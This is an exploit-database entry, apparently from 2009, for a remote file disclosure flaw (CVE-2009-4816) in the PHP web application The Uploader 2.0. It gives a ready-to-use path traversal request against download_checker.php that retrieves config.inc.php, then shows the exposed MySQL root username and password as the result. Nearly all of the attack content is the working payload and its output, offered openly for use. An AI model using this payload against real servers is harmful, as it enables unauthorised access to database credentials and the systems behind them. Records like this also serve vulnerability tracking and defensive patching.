The Uploader 2.0 - File Disclosure

Author: Stack
type: webapps
platform: php
port: 
date_added: 2009-12-21  
date_updated:   
verified: 1  
codes: OSVDB-61270;CVE-2009-4816  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10599.txt  

# Title: The Uploader 2.0 Remote File disclosure Vulnerability
# Author: Stack

http://server/the_uploader/api/download_checker.php?filename=../config.inc.php

next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d

//MySQL configuration and connection functions
$main['host']="127.0.0.1";
$main['user']="root";
$main['pass']="jH445Ui";
$main['dbnm']="jkL_database";